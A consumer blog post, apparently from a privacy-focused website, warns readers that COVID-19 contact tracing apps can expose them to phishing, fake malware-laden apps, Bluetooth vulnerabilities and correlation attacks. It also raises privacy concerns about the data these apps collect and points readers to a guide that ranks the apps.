Contact tracing apps have been lauded as a new way to stop the spread of the coronavirus. Used together with other precautions (wearing masks indoors, disinfecting surfaces and your hands often, practicing social distancing, etc.), they should help us return to our normal lives while also staying safe.
If you’re not familiar with them, they’re mobile apps that alert you when you come into contact with someone who is infected, or when you visit a place where someone infected with COVID-19 has been. They either use Bluetooth or location services to do that:
- Bluetooth – Thanks to Google and Apple’s new API, all smartphones can now use Bluetooth to exchange tokens when they come into range. The apps regularly check the tokens to see if a user reported COVID-19 symptoms or a positive diagnosis. If someone does, the app sends exposure alerts to all users who came into contact with that person.
- Location services – The apps use cellular signals, WiFi signals, and GPS data to create a log of all the locations you visit throughout the day. If a user reports testing positive for the virus, the app sends you a notification saying you’ve visited the same place(s) as that user.
There are tons of contact tracing apps on the app stores (just look at all the different apps around the world!), and governments hope adoption will rise steadily.
But are they safe?
That’s a whole different story.
4 Ways Contact Tracing Apps Can Be Exploited
According to our research, these are the risks you expose yourself to:
1. Phishing Attacks
Scammers can pose as contact tracers, sending bogus text message alerts to people. The message tells them they came into contact with someone infected with COVID-19 and instructs them to follow a link for the next steps.
Unfortunately, that link doesn’t lead to a government website, but a fake phishing site set up by cybercriminals. The site asks for personal information, which the scammers can log and later use to commit identity theft or gain access to people’s bank accounts.
2. Fake Contact Tracing Apps
Researchers were able to find twelve fake apps pretending to be contact tracers on third party sites (so, not iTunes or Google Play). Here’s how malicious they were:
- Four of them used the Anubis banking malware, which works as a keylogger. Besides that, it can record phone calls too. Alternatively, they used SpyNote (a trojan) – malware that can access contact details, GPS data, and text messages.
- Eight of them used generic malware strains. There wasn’t any in-depth information about that, but malware is still dangerous no matter the strain.
What’s more, hackers already used a fake version of the NHS’ contact tracing app alongside phishing attacks in the UK.
You could argue that fake apps aren’t such a huge risk as long as you avoid shady download sites. But think about this – if the hackers are good enough, they can make the sites look exactly like official government websites or the iTunes/Google Play app stores.
3. Bluetooth Vulnerabilities
Many contact tracing apps use Bluetooth to work. Unfortunately, Bluetooth has had (and continues to have) various issues. Here are just a few of them:
- BIAS Attack – A very recent vulnerability that would allow hackers to get full access to your device.
- KNOB Attack – A serious exploit that would allow cybercriminals to downgrade Bluetooth encryption to the point where they could easily crack it.
- BlueBorn – A security issue that would allow someone to connect directly to your smartphone.
Issues like that get patched quick, true. But if you happen to use an off-brand device because it’s cheaper, there’s a chance your manufacturer didn’t bother with rolling out updates for those problems.
4. Correlation Attacks
This is an issue with Apple and Google’s new API. While it does make it hard for hackers to eavesdrop on Bluetooth tokens to track people, the FTC’s former chief technologist (Ashkan Soltani) managed to show how a correlation attack can still compromise users’ identities.
Basically, someone would have to use a camera to record passerby’s faces, and a rooted smartphone. They could use the phone to see contact-tracing Bluetooth signals.
When someone reports testing positive for the virus, the eavesdropper will receive the user’s keys from the contact-tracing server on the app. They could then try to match up the codes broadcasted by said user at the exact moment they passed by the camera.
TL;DR: if a hacker’s really good, they could tell who tested positive for COVID-19 even though the new API should keep everyone anonymous.
Privacy Concerns Are Also a Problem
Let’s say you’re not worried about those vulnerabilities. Fair enough, how about how the app handles your privacy?
That’s actually one of the reasons adoption is so low. People feel uncomfortable sharing too much data with these apps.
No surprises there. Especially when you have apps that ask you for way too personal information, like your:
- Full name
- Phone number
Some of them even ask for access to your phone’s contacts.
Furthermore, some contact tracing apps might share all the data they collect with third parties. We’re not just talking about health officials and people in the government, but also private companies and advertisers.
Overall, it’s extremely intrusive and feels very creepy.
Finding a Reliable Contact Tracing App
Don’t worry – it won’t take you hours of research. Just use ProPrivacy’s guide and look at all the different apps around the world.
They’re ranked according to how well they handle privacy. So check if the app(s) available in your area show up there and see how safe they are to use.
How Do You Feel about Contact Tracing Apps?
Do you think they’re reliable and safe to use? Or do you believe they’re a privacy nightmare that’s just waiting to happen?
Whatever your opinion, go ahead and share it with us in the comments or on social media. Also, if you know other ways these apps can be exploited, please let us know.